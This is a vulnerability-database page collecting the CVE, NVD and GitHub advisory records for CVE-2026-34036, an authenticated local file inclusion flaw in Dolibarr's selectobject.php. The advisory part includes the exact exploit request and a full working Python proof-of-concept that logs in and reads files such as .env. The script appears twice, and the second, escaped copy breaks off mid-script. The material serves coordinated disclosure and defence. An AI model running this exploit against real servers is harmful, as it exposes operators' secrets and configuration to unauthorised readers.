CVE-2026-34036 (GCVE-0-2026-34036)

Vulnerability from cvelistv5 – Published: 2026-03-31 01:39 – Updated: 2026-03-31 13:57

Title

Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php

Summary

Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-98 - Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/Dolibarr/dolibarr/security/adv…	x_refsource_CONFIRM
	https://github.com/Dolibarr/dolibarr/commit/743c2…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	Dolibarr	dolibarr	Affected: <= 22.0.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34036",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-31T13:57:14.553725Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-31T13:57:45.230Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "dolibarr",
          "vendor": "Dolibarr",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 22.0.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs\u2026). At time of publication, there are no publicly available patches."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-98",
              "description": "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-31T01:39:38.178Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"
        },
        {
          "name": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a"
        }
      ],
      "source": {
        "advisory": "GHSA-2mfj-r695-5h9r",
        "discovery": "UNKNOWN"
      },
      "title": "Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34036",
    "datePublished": "2026-03-31T01:39:38.178Z",
    "dateReserved": "2026-03-25T15:29:04.744Z",
    "dateUpdated": "2026-03-31T13:57:45.230Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-34036\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-31T03:15:57.710\",\"lastModified\":\"2026-04-03T16:54:36.280\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs\u2026). At time of publication, there are no publicly available patches.\"},{\"lang\":\"es\",\"value\":\"Dolibarr es un paquete de software de planificaci\u00f3n de recursos empresariales (ERP) y gesti\u00f3n de relaciones con clientes (CRM). En las versiones 22.0.4 y anteriores, existe una vulnerabilidad de inclusi\u00f3n local de ficheros (LFI) en el endpoint AJAX principal /core/ajax/selectobject.php. Al manipular el par\u00e1metro objectdesc y explotar un fallo l\u00f3gico de \u0027fail-open\u0027 en la funci\u00f3n de control de acceso principal restrictedArea(), un usuario autenticado sin privilegios espec\u00edficos puede leer el contenido de ficheros no PHP arbitrarios en el servidor (como .env, .htaccess, copias de seguridad de configuraci\u00f3n o registros...). En el momento de la publicaci\u00f3n, no hay parches disponibles p\u00fablicamente.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-98\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:dolibarr:dolibarr_erp\\\\/crm:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"22.0.4\",\"matchCriteriaId\":\"3BAE3269-374D-425C-B943-C4DA4494F7BF\"}]}]}],\"references\":[{\"url\":\"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-34036\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-31T13:57:14.553725Z\"}}}], \"references\": [{\"url\": \"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-31T13:57:07.139Z\"}}], \"cna\": {\"title\": \"Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php\", \"source\": {\"advisory\": \"GHSA-2mfj-r695-5h9r\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"Dolibarr\", \"product\": \"dolibarr\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 22.0.4\"}]}], \"references\": [{\"url\": \"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r\", \"name\": \"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a\", \"name\": \"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs\\u2026). At time of publication, there are no publicly available patches.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-98\", \"description\": \"CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program (\u0027PHP Remote File Inclusion\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-31T01:39:38.178Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-34036\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-31T13:57:45.230Z\", \"dateReserved\": \"2026-03-25T15:29:04.744Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-31T01:39:38.178Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-34036

Vulnerability from fkie_nvd - Published: 2026-03-31 03:15 - Updated: 2026-04-03 16:54

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a	Patch
security-advisories@github.com	https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	dolibarr	dolibarr_erp\/crm	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3BAE3269-374D-425C-B943-C4DA4494F7BF",
              "versionEndIncluding": "22.0.4",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs\u2026). At time of publication, there are no publicly available patches."
    },
    {
      "lang": "es",
      "value": "Dolibarr es un paquete de software de planificaci\u00f3n de recursos empresariales (ERP) y gesti\u00f3n de relaciones con clientes (CRM). En las versiones 22.0.4 y anteriores, existe una vulnerabilidad de inclusi\u00f3n local de ficheros (LFI) en el endpoint AJAX principal /core/ajax/selectobject.php. Al manipular el par\u00e1metro objectdesc y explotar un fallo l\u00f3gico de \u0027fail-open\u0027 en la funci\u00f3n de control de acceso principal restrictedArea(), un usuario autenticado sin privilegios espec\u00edficos puede leer el contenido de ficheros no PHP arbitrarios en el servidor (como .env, .htaccess, copias de seguridad de configuraci\u00f3n o registros...). En el momento de la publicaci\u00f3n, no hay parches disponibles p\u00fablicamente."
    }
  ],
  "id": "CVE-2026-34036",
  "lastModified": "2026-04-03T16:54:36.280",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-31T03:15:57.710",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-98"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-2MFJ-R695-5H9R

Vulnerability from github – Published: 2026-03-27 18:04 – Updated: 2026-03-31 18:40

Summary

Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php

Details

Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure

Target

Dolibarr Core (Tested on version 22.0.4)

Summary

A Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…).

Vulnerability Details

The vulnerability is caused by a critical design flaw in /core/ajax/selectobject.php where dynamic file inclusion occurs before any access control checks are performed, combined with a fail-open logic in the core ACL function.

Arbitrary File Inclusion BEFORE Authorization: The endpoint parses the objectdesc parameter into a $classpath. If fetchObjectByElement fails (e.g., by providing a fake class like A:conf/.htaccess:0), the application falls back to dol_include_once($classpath) at line 71. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens before the application checks any user permissions.
Access Control Bypass (Fail-Open): At line 102, the application finally attempts to verify permissions by calling restrictedArea(). Because the object creation failed, the $features parameter sent to restrictedArea() is empty (''). Inside security.lib.php, if the $features parameter is empty, the access check block is completely skipped, leaving the $readok variable at 1. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.

This allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like .htaccess, .env, .json, .sql) are dumped into the HTTP response before the application crashes.

Steps to Reproduce

Log in to the Dolibarr instance with any user account (no specific permissions required).
Intercept or manually forge a GET request to the following endpoint:

GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0

Observe the HTTP response. The contents of the conf/.htaccess file will be reflected in the response body right before the PHP Fatal Error message.
(Optional) Run the attached Python PoC to automate the extraction:

python3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess

Impact

An attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (.env), infrastructure configurations (.htaccess), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.

Suggested Mitigation

Input Validation & Whitelisting: The $classpath must be strictly validated or whitelisted before being passed to dol_include_once().
Execution Flow Correction: The file inclusion logic must never be executed before the user's authorization has been fully verified.
Enforce Fail-Secure ACLs: Modify restrictedArea() in core/lib/security.lib.php so that if the $features parameter is empty, access is explicitly denied ($readok = 0) instead of allowed by default.

Disclosure Policy & Assistance

The reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.

Should any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.

Thank you for the time and commitment to securing Dolibarr.

Best Regards, Vincent KHAYAT (cnf409)

Video PoC

https://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844

PoC Script

#!/usr/bin/env python3
"""Dolibarr selectobject.php authenticated LFI PoC"""

import argparse
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

LOGIN_MARKERS = ("Login @", "Identifiant @")
LOGOUT_MARKERS = ("/user/logout.php", "Logout", "Mon tableau de bord")

def request(
    opener, base_url, method, path, params=None, data=None, timeout=15
):
    url = f"{base_url.rstrip('/')}{path}"
    if params:
        url = f"{url}?{urllib.parse.urlencode(params)}"
    payload = urllib.parse.urlencode(data).encode("utf-8") if data else None
    req = urllib.request.Request(url, method=method.upper(), data=payload)
    req.add_header("User-Agent", "dolibarr-lfi-poc/1.0-securitytest-for-dolibarr")
    req.add_header("Accept", "text/html,application/xhtml+xml")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")

def extract_login_token(page):
    for pattern in (
        r'name=["\']token["\']\s+value=["\']([^"\']*)["\']',
        r'name=["\']anti-csrf-newtoken["\']\s+content=["\']([^"\']*)["\']',
    ):
        match = re.search(pattern, page, flags=re.IGNORECASE)
        if match:
            return match.group(1)
    return ""

def looks_authenticated(body):
    return any(marker in body for marker in LOGOUT_MARKERS)

def clean_included_output(body):
    for marker in (
        "<br />\n<b>Warning",
        "<br />\r\n<b>Warning",
        "<br />\n<b>Fatal error",
        "<br />\r\n<b>Fatal error",
    ):
        pos = body.find(marker)
        if pos != -1:
            return body[:pos].rstrip()
    return body.rstrip()

def login(opener, base_url, username, password):
    code, login_page = request(opener, base_url, "GET", "/")
    if code >= 400:
        return False, f"HTTP {code} on login page"
    token = extract_login_token(login_page)
    code, after_login = request(
        opener,
        base_url,
        "POST",
        "/index.php?mainmenu=home",
        data={
            "token": token,
            "actionlogin": "login",
            "loginfunction": "loginfunction",
            "username": username,
            "password": password,
        },
    )
    if code >= 400:
        return False, f"HTTP {code} on login request"
    if looks_authenticated(after_login):
        return True, ""
    code, home = request(opener, base_url, "GET", "/index.php?mainmenu=home")
    if code < 400 and looks_authenticated(home):
        return True, ""
    return False, "Invalid username or password"

def read_file(opener, base_url, relative_path):
    status, body = request(
        opener,
        base_url,
        "GET",
        "/core/ajax/selectobject.php",
        params={
            "outjson": "0",
            "htmlname": "x",
            "objectdesc": f"A:{relative_path}:0",
        },
    )
    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):
        raise RuntimeError("Session expired or not authenticated")
    return status, body, clean_included_output(body)

def parse_args():
    parser = argparse.ArgumentParser(
        description="Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4)."
    )
    parser.add_argument(
        "--url",
        default="http://127.0.0.1:8080",
        help="Dolibarr base URL (default: http://127.0.0.1:8080)",
    )
    parser.add_argument("--username", required=True, help="Dolibarr username")
    parser.add_argument("--password", required=True, help="Dolibarr password")
    parser.add_argument(
        "--file",
        dest="target_file",
        required=True,
        help="Target file to read (e.g. conf/.htaccess).",
    )
    return parser.parse_args()

def print_result(path, status, raw, clean):
    print(f"\n[+] HTTP status: {status}")
    print(f"[+] Requested file: {path}")
    print("=" * 80)
    if clean:
        print(html.unescape(clean))
    else:
        print("(No readable output extracted)")
    print("=" * 80)
    if clean != raw.rstrip():
        print("[i] PHP warnings/fatal output were trimmed from display.")

def summarize_error_body(body, limit=1200):
    text = html.unescape(body).strip()
    if not text:
        return "(Empty response body)"
    if len(text) > limit:
        return text[:limit].rstrip() + "\n... [truncated]"
    return text

def main():
    args = parse_args()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar())
    )
    ok, reason = login(opener, args.url, args.username, args.password)
    if not ok:
        print(f"[!] {reason}")
        return 1
    print("[+] Login successful.")
    try:
        status, raw, clean = read_file(opener, args.url, args.target_file)
        if status >= 400:
            print(f"[!] HTTP {status} while reading target file.")
            print("=" * 80)
            print(summarize_error_body(raw))
            print("=" * 80)
            return 1
        print_result(args.target_file, status, raw, clean)
        return 0
    except Exception as exc:
        print(f"[!] Error: {exc}")
        return 1

if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except KeyboardInterrupt:
        print("\nInterrupted.")
        raise SystemExit(130)

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "dolibarr/dolibarr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "22.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34036"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-98"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T18:04:19Z",
    "nvd_published_at": "2026-03-31T03:15:57Z",
    "severity": "MODERATE"
  },
  "details": "# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure\n\n## Target\n\nDolibarr Core (Tested on version 22.0.4)\n\n## Summary\n\nA Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs\u2026).\n\n## Vulnerability Details\n\nThe vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.\n\n- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.\n- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`\u0027\u0027`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.\n\nThis allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.\n\n## Steps to Reproduce\n\n- Log in to the Dolibarr instance with any user account (no specific permissions required).\n- Intercept or manually forge a GET request to the following endpoint:\n\n```\nGET /core/ajax/selectobject.php?outjson=0\u0026htmlname=x\u0026objectdesc=A:conf/.htaccess:0\n```\n\n- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.\n- *(Optional)* Run the attached Python PoC to automate the extraction:\n\n```\npython3 poc.py --url http://target.com --username \u0027\u003cusername\u003e\u0027 --password \u0027\u003cpassword\u003e\u0027 --file conf/.htaccess\n```\n\n## Impact\n\nAn attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.\n\n## Suggested Mitigation\n\n- **Input Validation \u0026 Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.\n- **Execution Flow Correction:** The file inclusion logic must never be executed before the user\u0027s authorization has been fully verified.\n- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.\n\n## Disclosure Policy \u0026 Assistance\n\nThe reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.\n\nShould any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.\n\nThank you for the time and commitment to securing Dolibarr.\n\nBest Regards,\nVincent KHAYAT (cnf409)\n\n## Video PoC\n\nhttps://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844\n\n## PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Dolibarr selectobject.php authenticated LFI PoC\"\"\"\n\nimport argparse\nimport html\nimport re\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nfrom http.cookiejar import CookieJar\n\nLOGIN_MARKERS = (\"Login @\", \"Identifiant @\")\nLOGOUT_MARKERS = (\"/user/logout.php\", \"Logout\", \"Mon tableau de bord\")\n\ndef request(\n    opener, base_url, method, path, params=None, data=None, timeout=15\n):\n    url = f\"{base_url.rstrip(\u0027/\u0027)}{path}\"\n    if params:\n        url = f\"{url}?{urllib.parse.urlencode(params)}\"\n    payload = urllib.parse.urlencode(data).encode(\"utf-8\") if data else None\n    req = urllib.request.Request(url, method=method.upper(), data=payload)\n    req.add_header(\"User-Agent\", \"dolibarr-lfi-poc/1.0-securitytest-for-dolibarr\")\n    req.add_header(\"Accept\", \"text/html,application/xhtml+xml\")\n    try:\n        with opener.open(req, timeout=timeout) as resp:\n            return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n    except urllib.error.HTTPError as err:\n        return err.code, err.read().decode(\"utf-8\", errors=\"replace\")\n\ndef extract_login_token(page):\n    for pattern in (\n        r\u0027name=[\"\\\u0027]token[\"\\\u0027]\\s+value=[\"\\\u0027]([^\"\\\u0027]*)[\"\\\u0027]\u0027,\n        r\u0027name=[\"\\\u0027]anti-csrf-newtoken[\"\\\u0027]\\s+content=[\"\\\u0027]([^\"\\\u0027]*)[\"\\\u0027]\u0027,\n    ):\n        match = re.search(pattern, page, flags=re.IGNORECASE)\n        if match:\n            return match.group(1)\n    return \"\"\n\ndef looks_authenticated(body):\n    return any(marker in body for marker in LOGOUT_MARKERS)\n\ndef clean_included_output(body):\n    for marker in (\n        \"\u003cbr /\u003e\\n\u003cb\u003eWarning\",\n        \"\u003cbr /\u003e\\r\\n\u003cb\u003eWarning\",\n        \"\u003cbr /\u003e\\n\u003cb\u003eFatal error\",\n        \"\u003cbr /\u003e\\r\\n\u003cb\u003eFatal error\",\n    ):\n        pos = body.find(marker)\n        if pos != -1:\n            return body[:pos].rstrip()\n    return body.rstrip()\n\ndef login(opener, base_url, username, password):\n    code, login_page = request(opener, base_url, \"GET\", \"/\")\n    if code \u003e= 400:\n        return False, f\"HTTP {code} on login page\"\n    token = extract_login_token(login_page)\n    code, after_login = request(\n        opener,\n        base_url,\n        \"POST\",\n        \"/index.php?mainmenu=home\",\n        data={\n            \"token\": token,\n            \"actionlogin\": \"login\",\n            \"loginfunction\": 